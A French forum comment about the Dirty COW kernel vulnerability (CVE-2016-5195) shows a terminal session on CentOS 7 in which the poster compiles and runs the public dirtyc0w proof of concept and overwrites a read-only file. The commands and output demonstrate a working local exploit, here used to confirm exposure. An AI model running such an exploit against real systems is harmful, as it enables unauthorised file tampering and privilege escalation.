• # Exploitable sur CentOS 7

    Posté par (site web personnel) . En réponse au journal CVE-2016-5195 Dirty COW. Évalué à 2. Dernière modification le 22 octobre 2016 à 11:09.

    En tout cas, sur CentOS 7, ça fonctionne :

     [xate@xate-test ~]$ cat /etc/redhat-release 
     CentOS Linux release 7.2.1511 (Core) 
     [xate@xate-test ~]$ uname -a
     Linux xate-test.nfrance.com 3.10.0-327.28.2.el7.x86_64 #1 SMP Wed Aug 3 11:11:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
     [xate@xate-test ~]$ sudo echo 'test de la faille dirtycow' > /tmp/plop
     [xate@xate-test ~]$ chmod 0404 /tmp/plop
     [xate@xate-test ~]$ ls -ltrh /tmp/plop
     -r-----r--. 1 xate xate 27 22 oct. 13:47 /tmp/plop
     [xate@xate-test ~]$ cat /tmp/plop
     test de la faille dirtycow
     [xate@xate-test ~]$ gcc -pthread dirtyc0w.c -o dirtyc0w
     [xate@xate-test ~]$ ./dirtyc0w /tmp/plop m00000000000000000
     mmap 7f661fa2f000
     ^C
     [xate@xate-test ~]$ cat /tmp/plop 
     m00000000000000000dirtycow
     [xate@xate-test ~]$